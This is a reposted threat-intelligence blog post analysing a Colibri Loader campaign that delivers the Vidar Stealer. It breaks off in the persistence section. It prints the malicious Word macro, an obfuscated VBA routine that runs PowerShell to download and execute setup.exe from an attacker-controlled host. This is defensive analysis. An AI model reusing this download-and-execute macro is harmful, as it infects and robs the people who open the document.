{"id":18679,"date":"2022-04-05T11:10:10","date_gmt":"2022-04-05T19:10:10","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2022\/04\/05\/news-12412\/"},"modified":"2022-04-05T11:10:10","modified_gmt":"2022-04-05T19:10:10","slug":"news-12412","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2022\/04\/05\/news-12412\/","title":{"rendered":"Colibri Loader combines Task Scheduler and PowerShell in clever persistence technique"},"content":{"rendered":"

Credit to Author: Threat Intelligence Team| Date: Tue, 05 Apr 2022 18:36:35 +0000<\/strong><\/p>\n

This blog post was authored by Ankur Saini, with contributions from Hossein Jazi and J\u00e9r\u00f4me Segura<\/em><\/p>\n

Colibri Loader is a relatively new piece of malware that first appeared on underground forums in August 2021 and was advertised to “people who have large volumes of traffic and lack of time to work out the material<\/em>“. As it names suggests, it is meant to deliver and manage payloads onto infected computers.<\/p>\n

Our Threat Intelligence Team recently uncovered a new Colibri Loader campaign delivering the Vidar Stealer as final payload. There is already published material about Colibri by CloudSek<\/a> and independent researchers<\/a>. Since most of the details about the bot have been covered, we decided to highlight a persistence technique we haven’t seen before.<\/p>\n

Campaign attack chain<\/h3>\n

The attack starts with a malicious Word document deploying Colibri bot that then delivers the Vidar Stealer. The document contacts a remote server at (securetunnel[.]co) to load a remote template named trkal0.dot that contacts a malicious macro. This attack is known as remote template injection.<\/p>\n

\n
\"\"<\/a><\/figure>\n<\/div>\n

The macro enables PowerShell to download the final payload (Colibri Loader) as setup.exe:<\/p>\n

Private Sub Document_Open()<\/code>
zgotwed = \"C:UsersPublicsetup.ex`e\"<\/code>
n87lcy4 = Replace(\"new:72Cs19e4ts4D\", \"s19e4ts\", \"2\")<\/code>
Set hu9v0dd = GetObject(n87lcy4 & \"D5-D70A-438B-8A42-984\" & CLng(\"1.8\") & \"4B88AFB\" & CInt(\"8.1\"))<\/code>
hu9v0dd.exec \"cm\" & \"d \/c powers^hell -w hi Start-BitsTransfer -Sou htt`ps:\/\/securetunnel .co\/connection\/setup.e`xe -Dest \" & zgotwed & \";\" & zgotwed<\/code>
End Sub<\/code><\/p>\n

Abusing PowerShell for Persistence<\/h3>\n

Colibri leverages PowerShell in a unique way to maintain persistence after a reboot. Depending on the Windows version, Colibri drops its copy in %APPDATA%LocalMicrosoftWindowsApps and names it Get-Variable.exe for Windows 10 and above, while for lower versions it drops it in %DOCUMENTS%\/WindowsPowerShell named as dllhost.exe<\/p>\n

On Windows 7, it creates a scheduled task using the following command:<\/p>\n